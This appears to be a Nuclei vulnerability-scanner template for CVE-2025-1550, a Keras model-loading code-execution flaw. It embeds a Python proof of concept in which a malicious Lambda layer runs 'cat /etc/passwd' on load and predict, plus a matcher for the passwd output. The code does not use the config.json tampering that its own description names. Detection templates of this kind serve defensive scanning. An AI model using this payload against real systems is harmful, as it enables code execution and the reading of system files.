mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
80 lines · 2.7 KiB · YAML
id: CVE-2025-1550
|
|
|
|
info:
|
|
name: Keras Model.load_model - Arbitrary Code Execution
|
|
author: nukunga[seunghyeonJeon]
|
|
severity: critical
|
|
description: |
|
|
    The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model loading.
|
|
impact: |
|
|
Attackers can execute arbitrary code during model loading, potentially leading to remote code execution or system compromise.
|
|
remediation: |
|
|
Update to the latest version of Keras where this issue is fixed or apply security patches provided by the developers.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-1550
|
|
- https://github.com/keras-team/keras/pull/20751
|
|
- https://towerofhanoi.it/writeups/cve-2025-1550/
|
|
classification:
|
|
epss-score: 0.04785
|
|
epss-percentile: 0.89156
|
|
metadata:
|
|
max-request: 1
|
|
tags: cve,cve2025,code,keras,rce,ml
|
|
|
|
self-contained: true
|
|
|
|
code:
|
|
- engine:
|
|
- py
|
|
- python3
|
|
|
|
source: |
|
|
import os
|
|
import sys
|
|
|
|
try:
|
|
import tensorflow as tf
|
|
from tensorflow.keras.models import load_model
|
|
from tensorflow.keras.layers import Lambda, Input
|
|
from tensorflow.keras.models import Model
|
|
import numpy as np
|
|
except ImportError:
|
|
sys.exit(1)
|
|
|
|
def create_malicious_model():
    """Build a minimal Keras model whose Lambda layer carries an OS-command payload.

    The nested callable reads /etc/passwd via os.popen and echoes the output
    to stdout, then passes its tensor argument through unchanged so the model
    remains structurally valid and serializable.
    """
    def payload(tensor):
        # Side effect: run the command and print what it produced.
        print(os.popen("cat /etc/passwd").read())
        return tensor

    # Single-feature input wired straight into the booby-trapped Lambda layer.
    inp = Input(shape=(1,))
    out = Lambda(payload, name="evil_lambda")(inp)
    return Model(inputs=inp, outputs=out)
|
|
|
|
def exploit_lambda_layer():
    """Save the malicious model, reload it, and trigger the Lambda payload.

    Returns:
        True when the full round-trip (save -> load_model -> predict) completes,
        demonstrating code execution on load/inference; False on any failure.

    The temporary .keras archive is always removed in the finally block.
    """
    model_path = "/tmp/malicious_model.keras"
    try:
        model = create_malicious_model()
        model.save(model_path)
        # Drop the in-memory model so the reload below is a genuine deserialization.
        del model

        # Vulnerable step: load_model deserializes the archive, restoring the Lambda.
        loaded_model = load_model(model_path)
        test_input = np.array([[1.0]])
        # predict() invokes the Lambda layer, executing the embedded command.
        loaded_model.predict(test_input, verbose=0)

        return True
    # Fix: the original bare `except:` also swallowed SystemExit and
    # KeyboardInterrupt; catch only ordinary exceptions.
    except Exception:
        return False
    finally:
        # model_path is bound before the try, so it is always defined here.
        if os.path.exists(model_path):
            os.remove(model_path)


exploit_lambda_layer()
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: response
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 4a0a0047304502200b3639bf4133444d02527e51a65422d49bfd3c8d83548e80319a56140b5d6a58022100b8c0b3f283adaa6bf284c2f7053351f15a3d06383859401caff96390f8bddea2:922c64590222798bb761d5b6d8e72950 |